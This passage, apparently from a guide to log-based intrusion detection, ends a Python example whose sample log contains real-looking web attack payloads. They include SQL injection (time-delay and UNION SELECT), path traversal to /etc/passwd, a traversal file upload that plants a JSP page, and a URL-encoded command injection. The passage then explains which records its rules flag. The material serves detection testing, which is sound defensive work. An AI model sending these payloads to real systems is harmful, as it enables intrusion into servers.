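{"src":"198.51.100.7","method":"POST","uri":"/admin/pr_monitor/getting_index_data.php","status":200,"body":"req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450"}
{"src":"198.51.100.7","method":"GET","uri":"/attachment?file=/etc/passwd","status":200,"body":""}
{"src":"198.51.100.8","method":"POST","uri":"/CDGServer3/js/../NavigationAjax","status":500,"body":"command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId="}
{"src":"198.51.100.9","method":"GET","uri":"/entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist","status":200,"body":""}
{"src":"198.51.100.9","method":"POST","uri":"/servlet/uploadAttachmentServlet","status":200,"body":"------X\r\nContent-Disposition: form-data; name=\"uploadFile\"; filename=\"../../../../../jboss/web/fe.war/hello.jsp\"\r\n\r\n<% out.println(\"hello\");%>\r\n------X--"}
{"src":"198.51.100.10","method":"GET","uri":"/cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20","status":200,"body":""}
{"src":"203.0.113.5","method":"GET","uri":"/index.php?s=/article/list&page=2","status":200,"body":""}
{"src":"203.0.113.6","method":"POST","uri":"/attachment?file=report.pdf","status":200,"body":""}
"""

if __name__ == "__main__":
    for src, uri, hits in scan_jsonl(SAMPLE_LOG):
        print(src, uri, ",".join(hits))
```

Run it as a script to see the seven records that fire; the ordinary article listing produces nothing, and the legitimate /attachment?file=report.pdf request produces only watched_endpoint. Bodies are only available where the proxy or WAF records them; with plain access logs, the rules on POST bodies (items 186, 191, 193, 195, 201 and the uploads) cannot fire, which is an argument for enabling body capture on the endpoints listed here.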
